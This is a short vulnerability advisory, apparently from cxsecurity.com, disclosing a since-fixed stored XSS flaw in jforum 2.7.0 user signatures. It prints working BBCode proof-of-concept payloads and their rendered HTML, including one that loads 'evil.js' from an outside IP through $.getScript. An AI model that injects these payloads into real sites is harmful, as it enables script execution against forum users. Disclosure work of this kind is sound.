jforum 2.7.0 Cross Site Scripting

2021.09.04
Credit: Kun Song
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

hi, I found a vulnerability in the jforum 2.7.0. It is a storage cross site script vulnerability. The place is the user's profile - signature. The technique of the vulnerability is the same as that described in this article "STORED CROSS SITE SCRIPTING IN BBCODE" ( https://mindedsecurity.com/advisories/msa130510/), and the POC is: color tag: [color=red" onMouseOver="alert('xss')]XSS[/color] [color=red" onMouseOver="$.getScript('http://192.168.45.148:8080/evil.js') ;"]XSS[/color] Renders into HTML: <font onmouseover="alert('xss')" color="red">XSS</font> <font onmouseover="$.getScript('http://192.168.45.148:8080/evil.js');" color="red">XSS</font> img tag: [img]/demo.jpg" onMouseOver="alert('xss')[/img] Renders into HTML: <img src="/demo.jpg" onmouseover="alert('xss')" alt="image"> url= tag: [url='http://www.demo.com" onMouseOver="alert('xss')']test[/url] Renders into HTML: <a class="snap_shots" href="http://www.demo.com" onmouseover="alert('xss')" target="_blank">test</a> through analysis, the forum has set the cookie to http-only, but the attacker can use the $.getScript to do some evil things. this vulnerability has been fixed in https://sourceforge.net/p/jforum2/code/934/ . timeline: 2021-04-21 announce the developer of Jforum by e-mail 2021-04-22 Jforum fixed the vulnerability, and will include this fix in next release 2021-09-02 send this mail to bugtraq&fulldisclosure


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top